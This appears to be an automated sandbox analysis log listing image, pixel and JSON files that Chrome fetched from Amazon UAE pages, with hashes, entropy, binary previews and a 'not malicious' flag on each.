                                                                                                                                                                                                                                                                      MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                                                                                      SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                                                                                      SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                                                                                      SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 125x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):3285
                                                                                                                                                                                                                                                                      Entropy (8bit):7.855817789597912
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TzPae9Vrz8qPQPyHoglJWyAT/OLYq8TKoJXYeHFDYCD:3PaMVrLQPm5JWvT/q8meXVlDYCD
                                                                                                                                                                                                                                                                      MD5:431D10AB2F36F9779CCBE3DF87898ECA
                                                                                                                                                                                                                                                                      SHA1:6A57C677D8DE1128BDB326169F5E541D7EBB559B
                                                                                                                                                                                                                                                                      SHA-256:552A40BE6AB03FDC760AED68AF3DB6C1AB00314EBE0F46A0501705193F5DA3AE
                                                                                                                                                                                                                                                                      SHA-512:6D8B4A2A23A406287FEA0C25B9B1EDA3A860598CA406B21BF8985DF00F8B91DC6F1E01DEAA06BAC49966F77A5F542D5B2357803F22542CB0F57F1294A530AB33
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........}.."...............................................................!.1Q.."Aq...2r...#3BRas.........4Cb..S..$&u................................................1A.!.2."B............?..E.<....[.O>...s...X......88jQq.r......[e!. .....5Y...-......\._.~.....5^ ...}.d..........Pl.(...P.'..#.....3<.yE.^5,.j.....l^.$....4A.h'..xK......R.J."...../8.f...&...6..Ds.X.l.......C.Z@..,M..l;....d..9....>B..=.Kr.n...W.G<2...p..$.......]9...}.=..T\.....A.+.." "T..L.$...O...O.........b..t.s....x .Eji....a<.Zz.*....:3Sg.......oyA...O.6[..'ZYX".R.y..x.../..[E..x.f.....V...e....k..K.V....$..w......C...P...R.xOdo...<..Xk....u..].u..}W;.bp|J._...~..A.....:5~Z......Y..(.^.N....X..p...B....o...i.PG.9..........^.Y]Ol..8<..~....eg.....TM[..].....[KS..@...vS.M...."......F..".'....6h..Q.A.,.......N.G.b............'(X-<..n.Lz...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):42
                                                                                                                                                                                                                                                                      Entropy (8bit):3.0241026136709444
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQEsJ+q:1QEsJ+q
                                                                                                                                                                                                                                                                      MD5:32023BB33CFB2A1990A4EF2D85B6AC16
                                                                                                                                                                                                                                                                      SHA1:23DCC6D4B5BFE00357FD0248BB5955B8E36BB8F1
                                                                                                                                                                                                                                                                      SHA-256:99C2917EE5B2A01459A923BDD1C676F15EE73B62B87F696E6735312D26F51E12
                                                                                                                                                                                                                                                                      SHA-512:D052ECEC2839340876EB57247CFC2E777DD7F2E868DC37CD3F3F740C8DEB94917A0C9F2A4FC8229987A0B91B04726DE2D1E9F6BCBE3F9BEF0E4B7E0D7F65EA12
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L.;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 16 x 16
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):1639
                                                                                                                                                                                                                                                                      Entropy (8bit):7.006723249485537
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:aqd6hCTOfaVoAp3p2vxQ1Wwb2h46lgxmR4OV9dFA+9MMy0:Jzo83pwujb2h4nmR4OVXFr9Nl
                                                                                                                                                                                                                                                                      MD5:5552D8845A31BAFBD8854A657E10E434
                                                                                                                                                                                                                                                                      SHA1:24EE24D1E07F067B0A2AE4F6D24238E614BF0B5B
                                                                                                                                                                                                                                                                      SHA-256:98CF6F0429217D92558C4BA49E03C0673ABF69AAACD25AC472A378048B317E05
                                                                                                                                                                                                                                                                      SHA-512:B227E1FECF9051CE7BF19754201504D91FEFE9AE7EB75279EDFEA90A1C2EC6FCB4E96CE258EAA82070DC4FD306E323A2D2C8B324CD231574DC8C0CFB6094958B
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.................................................0...................!.......S.....h..j.....C..........s....8.....O....\............k...........,..........I..X..&........`....4.....d....b..}......?..y..........o............K............{..E........=..w....*............Q.......f..V..T....2..^..;..:....$.....m..M..G..A........6........u..(..Z..q..............!..NETSCAPE2.0.....!.......,...................-o....q40%.....N2mn3K..G....Ol!......a2Y.../..c.+..M/.p$....1.OX.... ."U>..I...O.. ....Jd...3>..+?A,.G..V.H.b@."BL!.H..WF@`...`.....!.......,...............ah=.eR...Hdg28.:4i,..6jQ+....0:..c......NO-....Q......c7......;..........5.kJ...M./.Tb.K......Lk...K1S....,f.<...9....kP3I.G....!.....+.,...............NY`O......".OUX$.&'.V.(_....T[...W^.H.._...)JZ..J\R.Y ...]&.QG...%.!L..P...S*.......Z.......P.....G.K...M.#.I..MK..... .....!.......,............../#!J.@'.....".?(e&....-Q'...IRU6H..,.V..Zi7..f#..Q.a.....+[h'Z....lgC'...mr>H5...\..# ..0-.SVW.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, progressive, precision 8, 1500x600, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):33268
                                                                                                                                                                                                                                                                      Entropy (8bit):7.74699063138377
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:4YyvCAlYCdmwKNDe2/DaBDbdKzTCnbUVF9X7G5Vyc:4UC0wKR0BDbETCnIF3c
                                                                                                                                                                                                                                                                      MD5:44C5ACA9865E4D7DAD0F9AD4082EA612
                                                                                                                                                                                                                                                                      SHA1:14A6302B362BB33CCA565548E5F3017B090202CF
                                                                                                                                                                                                                                                                      SHA-256:7D182376483481C1C0EF3A2235B10CCF49DCF2C58B5AA51EA7BB8677916B72E0
                                                                                                                                                                                                                                                                      SHA-512:F16A8C815319CC9491C23C6D18CED92A2295A5F276E570EAD35B7A4AB991DE5016AB510BF291EF36951B09D2D820F5AE27AA9DB980E64175F87047B77A845710
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/51jO6YMJDUL._SX1500_.jpg
                                                                                                                                                                                                                                                                      Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):4884
                                                                                                                                                                                                                                                                      Entropy (8bit):5.103833073608011
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:IdNQzriJcrRR9EbtGeSDOMg32y0uqYT40STfKAHSTfXAp4YpU:IYzrIctR9Ef+VgmyA04fKAAXAp4YpU
                                                                                                                                                                                                                                                                      MD5:9CEF120EA11CE4A484A7BAC29E33A56C
                                                                                                                                                                                                                                                                      SHA1:154997E1997ECFBE56809F1BA4778C55E6E54729
                                                                                                                                                                                                                                                                      SHA-256:9654DB5ED929E13AD0EE9F7B6A3BD39B41D6C827F31D6976A9D79CB07EB47ADC
                                                                                                                                                                                                                                                                      SHA-512:263A5FA672B82CFA687EF3285085A7DB21164EBFF8620355A8DEA305E34D783A564AE083B5652A12858A06AA184E5D1BA08D7EF565648FBFB6CEC8BEF5272487
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:{"status":"ok","html":"<a data-a-modal=\"{&quot;url&quot;:&quot;/af/feedback-form?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Gateway_desktop-ad-center-1_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlLz8%3D%22%2C%22slotName%22%3A%22desktop-ad-center-1%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DROAZJXecL-vBvC-Yjxkq97kAAAGRdjK03wMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICDFIFP4%22%2C%22adCreativeId%22%3A%22577653937781864011%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D&daFlg=false&ie=UTF-8&quot;, &quot;name&quot;:&quot;shared-placement-feedback-modal-desktop-ad-center-1&quot;,&quot;header&quot;:&quot;Leave feedback&quot;,&quot;width&quot;:&quot;460&quot;}\" style=\"position: absolute; to
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 224x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):6891
                                                                                                                                                                                                                                                                      Entropy (8bit):7.948079304124011
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:Tuj5gLBMHWLwIJ7FVjo/yTOTSphS6DyrIdXYFxQZDPWF32EY3KpR9Aq47MikY/Pg:RLW6DJ7FKSOWpryr6WFm/336DSez3Kih
                                                                                                                                                                                                                                                                      MD5:61CD78ABCEEA9BADD1CBF93383890E89
                                                                                                                                                                                                                                                                      SHA1:8B262DA40AC0ECB2C398ADF185D019646F585AA3
                                                                                                                                                                                                                                                                      SHA-256:A8395389DE4F3772B0E58E7BC084B117FA1EC910F2265AAA1803739DF0A42547
                                                                                                                                                                                                                                                                      SHA-512:3573F304281E59B508E510271340254BB8DA78627C0F60E8E6F629971895D462FC88ABA9F6E7BFBB203E993CD351ABFF28443231B59AAA3112ED780C275B9D93
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..............................................................!..1..AQqs..."25ar.....#4BSctu........$D.&36RTb...%..Cd..................................................1."QR.23aqA...!#B............?..-r..9r..m.pM..q..2^..ygw..`s.l.....b......"p&.>L9....n.E..^.A.N..G..n......y.M.|...b..|.Yh`q".C.....=.X!.h#...g:...L..6.q........$Rr...5...DX....[....{7a..}...`~R..<.gR.i......Z.7v<Oc..tU.....3v*..`r.>..B.h...S.[iK(|..$..E@.iO.v....R:.....e4.../..P.F..b{..d.....Q..(.~....2...O.U\./..Sh.v..X.4.uv.-.&^...#.wa..?.........L..,....K..9v..{.2..4&......PzZ.Q'e...P.M..y.L|.G.*3.d.0.t....9.`....P..cn.0V.Z..(Pjw`.....t.......}.<....K.......P.Fwe..LF/^....b9c.`l....t[M.+..a.-.......r3g....4c...B...........'.j.ve#l...}..|..`.......V..k9[.3x..<el.1.^...EIT.?.,..P<.]n6......A.n..$..Ph)hD..l.......\.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 440x300, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):30634
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9233565379999416
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:a9ob/hXAJSGzlKwtckMm1kEhJkMRPrLAbWm:CoVX+7zl5tltJLVL8Wm
                                                                                                                                                                                                                                                                      MD5:CE0A83960C7365654C3011E6D620DDFE
                                                                                                                                                                                                                                                                      SHA1:AFC77A5E27F89C844FF2F343E0EBA9B19187F679
                                                                                                                                                                                                                                                                      SHA-256:EE85E44E1CAF49A252BADE5A729D7168B0C1EE1A88A8E22FB32E7ED4DB5F1808
                                                                                                                                                                                                                                                                      SHA-512:2ACDCBBB508F2BE5EF754237D4C78BE5D22F0279FCCF0B5026B75991844EE51461D6B180E21B0335695692634645DC05949C375BF50198DA1BFF8A1D5AEDBED6
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.....C....................................................................C.......................................................................,...."...........................................K..............................!..1Q.A..."aq#23.$%...&48Rrs.....5:BDbtv.....................................<..........................!..1."A..#2Qaq....$BR..3..%&5...............?..C..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1....ts..u.....e.Rw.J..v ......Q....[9O...u..{...:.....eSRL.y%}.. ...g2......{.w...B.pHL."?O(.%.....w..8...z.wq..9...1.o._...;...D?..g ?A....].NU..(.z..H..%7...A....t....E.8...D...l..A.c..I.}.....u........#....V."bL...C.B...p...=..!.H....J=.C.....btT.c.J.ap.....R.Q8.....~a.d...O........x..?.|....>G../.......Vh.G..2....v.....y..U1{/_..$#.t_|....U...E.R.+.l .L....s...^.2f/.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):4032
                                                                                                                                                                                                                                                                      Entropy (8bit):7.869044306421467
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:i5PPh+mj9AWYd1Rl0mh3P1Iu5dtduGqXH3TnT+UtAJR3qrt8E8aWya:iH+U9GqWtIwXsRXTnRUM8a6
                                                                                                                                                                                                                                                                      MD5:51C5C4FDE59FD0F3E266E8865CC71F97
                                                                                                                                                                                                                                                                      SHA1:0519C451847E1F670555DC7F3CDF4E84EF3C6227
                                                                                                                                                                                                                                                                      SHA-256:A4AE430072696319BF8D95CB4034081EEB1B16E09F467919FB8D77D78ADCE7F2
                                                                                                                                                                                                                                                                      SHA-512:C2F8782C007146985880014C19EAA6670D07681014AF7A7ED88F674B3A3EC0CEDDF1B07B120AC1CA67489425CF9E669668096083438031A6C25E85DB66BAA632
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/1741539_QC-HPC-Nutrition_186x116_2X_en_AE._SY116_CB566996700_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF...........................................)......)$,$!$,$A3--3AK?<?K[QQ[rlr................................)......)$,$!$,$A3--3AK?<?K[QQ[rlr.........t...."..........5....................................................................y.yE........3...e.\,.'.-...Ocw....dw..^8...Net..|S....@.i.....k...c|./9.r:;C89(..........i.y.....0.aq..@...j..(..+...}..)..T....9..H...<...$K.bt..T...Xk...g.l.e.{..L-......o...g.7...Ps.N.X.C.....'.@A|..#.....s]R$)O.hi....63.......s=......`.....'.....?;......$...:..1-_.t.2y...of./.,.:.@.......'..2N?#b2.......@...L.R.....G.r.....s...t.....P.d.....$.S..D...zz..k...03E...(..9 .......E..........................!.1A..."02QTaq... Brs.....4S...#36CR............?...:...M..!..rX.W.9.V?...9.V?...).R?...).R?...e.d..xv_V..5..Z?..f.x.#^.....xvoW..5..}^?..&.d..xroWO..%.t..D.$q.1.C~}.......T...Ga'.t./.......Z....S.).WB..<.%.x!}..b.dK.U[..FEj.....F..=..{..M..{...C5.v.[A*8s.L.!.F..-e}.5...7.$.&#]..+.y..p...Q.$.I..1.[g....21i+Oj.K5....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1500x80, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):5277
                                                                                                                                                                                                                                                                      Entropy (8bit):7.558803189279202
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:1rSnj8M9fnlVeJOTBaNqZSna+2uKwVeJuz4B7BGn8RMf0obn:1unjNfl00t5ZeCluzC7A8K0ob
                                                                                                                                                                                                                                                                      MD5:F5A6B216DCC08A367016DB19181D09D6
                                                                                                                                                                                                                                                                      SHA1:CE69C7B2058A06DF2C0EFEDF643CB146275B7A02
                                                                                                                                                                                                                                                                      SHA-256:EB635F458669BD7B3BB687B0547F4117B58C5EACE724B5E47B3F15DAC0DBE81C
                                                                                                                                                                                                                                                                      SHA-512:6F244E95DFFE5041E6D4E6F0B1C0AF662EE04215E43A056CED959751BAE600A62F60EA07B9A35A2B8875C84C2216C16864EC34EF5A7A9338BE20B2C0FBE55A5F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#........P...."................................................p.................................................p.........;...p.c...............7...........)..0{...~{...sW.C........n..=>.D............o...........uW...+~.)..r......X.....GV...>QM.5..;-............8...........!.-'q.h..X.......;'.S.Z*..Q..k"...6..........7............=..X.^~.....Kb........B.uU.W]..$.1.......................-z......X............p..........................................................................................................Aa..........m..J.s...........+X[........................................................................@......7G...G.X.....9.....c.-..6Y\#)..6.....:..........S..k4.Z.................s...$..........................`....0p ...........d.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.y...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 141x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):11599
                                                                                                                                                                                                                                                                      Entropy (8bit):7.967413309473415
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:Sr4vUhG+D4wLi1I+RDk5D/AFukEYllZP4p3Nb7GOZZHSh3a9vL4QdozM1xEJWbW/:25hGS4wRMUzCgtGOzyh3auDzM1xEiW/
                                                                                                                                                                                                                                                                      MD5:49090B94803AB6E687F8362F34140240
                                                                                                                                                                                                                                                                      SHA1:E99F86063737614375AFAB52F07540EC2E209E0B
                                                                                                                                                                                                                                                                      SHA-256:D1EF0B8D4DFC54202DC385FDD3DD6D64408A2F894AFC44928BBD50B8FD41E48E
                                                                                                                                                                                                                                                                      SHA-512:B29FED27AC1483C0030D66441E0DEBB29DD5E2F172A321EE72BC54526D90DD2683ACB867B7496EA8BB8B0F4C74116C60C61D5D5E9D7340EC502B6287BD0090C1
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!.1."A.#Q.2B...3Uaqr......6RTu......$Sb..%Dcs&Cd....................................................!1..."2AQaq....#4......3Bb.............?.....L.fUY.G9....x.<..._..<a.YY.)().Y.*...IM[.=.~.}..|~u.Q>{..:.9..5._.y...4rp...-.Fo.)*....8(.l.....J|.]...p1.#8.../....>.A q'.z.\5z.l.l.+*.$N......8]...p1.3......U.*a.g^K."H.o.......t..a\..%..?.J....k.......t.O...g..=......5....e..\E.si..].Mg..G.:..UQ..T....-.L.N.....$).._..;.'U.L....y..u.k=\..=Z57......5.N........[...N.Y..Gd.b.....eh.G..Z<..5.G.f.T.T"...7.)._......G.K.............c....L.O6...djvk...WV....F .LX.R..L*.!a%.....W..Cf..9..p.W.KD.x3W9..s.D.N]...UV...J......3E.jXC.w...........W...=...."&F.1.%.."..$h.....07.x.4..L.G.(x..bz....!.H.C.....!m.....F...T+..Ub.YX..lxo.....<...x.-kR.FeOq5
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x254, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):17629
                                                                                                                                                                                                                                                                      Entropy (8bit):7.959299957253685
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:/xOKjOEoH8U2pgS+o2TW8x3dpFJwMEbbO7l7qfZ35:/xjjuHd22PnxNx5EOI5
                                                                                                                                                                                                                                                                      MD5:18E60CDB66BB37F58A8DFF374ADCB698
                                                                                                                                                                                                                                                                      SHA1:3FD25D09464A435D39433B821AFBDCF50DDA1C27
                                                                                                                                                                                                                                                                      SHA-256:03116D383EC89862235BD2746DDD925CFFA2B12054E4F1F742B1BE9555B505E3
                                                                                                                                                                                                                                                                      SHA-512:6171E9F7B0EF255AF8CCDE78BA24E23E2C23DC6F227B5B13DF49453837FA73AD1C45C091760EBF9FB28FAEFBA8886070F2AAC6755844FC015A6833856002B674
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/61LEH6WEXkL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........@.."..........5.......................................................................1......^.e... g.........V...C.Zo.N.i.Ok..E.Sg....S....................m&.+..`t..xHu."..C..y0.JV..j....Nw.v5am..........[..0....9.'..>n>.....6....s...v.......s..Vc..+M'Y.m.(I!.M..-.#....s..v.z..n&\.i.%2Z........Z1....0H.....5N0.....I.+.Z..a,.}E......,..$.A..A..X.......[5.'.......}..+9..j....2..l.Zq..]..Rwa.[Y=.C|D....9e.Vd_.p..u.;.~..S]M.......nu.K......n#6.g.5m..[.....]2S...V.,$..G.j....vY..>J..s....Y.....']....|.l..n...+...F.c.y....>..A..+.{..-....r.2..zl.5..w.]})b.....R.`.A.^..V..wu,.-..V...`..F....3.,..=-........-.%v...S4}.76.C.tV.Z..Z.=.H..+.......=~..vL..w.."cm....wX:.|/..........s.@N..l.ObQ4..u..N)....;.u.6{'.....6.V...8.1...3G.VW...&.^.0x.s..^...;Xk+57m(..Vw...."..W.!Bd..d.W........w.9F.z.o
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 135x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):6869
                                                                                                                                                                                                                                                                      Entropy (8bit):7.938812725383721
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:jbl803vV81eti/W3Psbd7jxAmvtctp5yyF:jblLV81eti/WUPlvt+f1
                                                                                                                                                                                                                                                                      MD5:BCD5B7CAAF59AB38ED7DD9B9F1EF0829
                                                                                                                                                                                                                                                                      SHA1:82DFBAE570BA18F2EF231F0035BCD55F99F87EE6
                                                                                                                                                                                                                                                                      SHA-256:F11BFD9C69F7B76BFD491B87F523F0E6167688151CC2D333C479EDB75525CEC6
                                                                                                                                                                                                                                                                      SHA-512:DAB7A29AD60BCE29CF5667F423CEB7A4AA6DA8BCF65FAB885687151F42117FA6C802DA54D3150CA6A39FD5F56C4361DA7373691F1B6E00468A773C02D3022DBB
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71kXnq2XQiL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!1..AQ."aq..2Br...#3RS......T....$4Cbst......5..................................................!...1A"QR.2.....#aq.............?..(..(.....(....x&...G y......(.kW.u.(l.x.:?}r..q.......!+....;..2...k....'S.....-C.q...K..w:.+....?....%.G.m...^.[>..y%I..6..Zo.C~.p.!4.;.@..."....L.odj.^..O. ..gb...&..-....*...U.3.#..............C..S...u...B.A.......3[)........k.Z..QE..E.P..Q@.QE.QE..D.,J...T.X...RMF.g...@..O.['2Jk.;_..W.....O.U.ZE...g....`.N.W.i.#.;S.C.K.h7.>.V.q...HA....;.,6k.....hV6.g....bY6!*.r..P..._GgAD....R"..x.z...M7^.EDX.s.....5)..m...-....iE.$Q].r_....S..d..F....>}n.....:..+.e#..._v8.....Skv..M..).c*e~........C..}...O...KK;7/n!.$W......eO.U*....X\:0.....G...........[l[I....P"c.V7f.g.vT........!=.6.......9.....s..TG.....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUnl/7yltxlHh/:/+/
                                                                                                                                                                                                                                                                      MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                                                                                      SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                                                                                      SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                                                                                      SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://aax-eu.amazon.ae/x/px/REz88vUB1bF630ZNVKUQFtQAAAGRdjK03wMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICD-zm4e/atf/%7B%22atf%22:false%7D
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 750x300, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):17772
                                                                                                                                                                                                                                                                      Entropy (8bit):7.916838270669576
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:1IKB3dthG73h/d2JezRYETsuwS+fzkISXrf8jwQOiA:11t2PRFTHofzh8o2
                                                                                                                                                                                                                                                                      MD5:F8C5A6B00D7798BAEE06D7E6BEE0BCED
                                                                                                                                                                                                                                                                      SHA1:39104B348748423ED74C973D3188BD358436D173
                                                                                                                                                                                                                                                                      SHA-256:4B4B16B7122CC82BF2AE616353895C5F708ADA108CAF43B30AEF3239FDF7118E
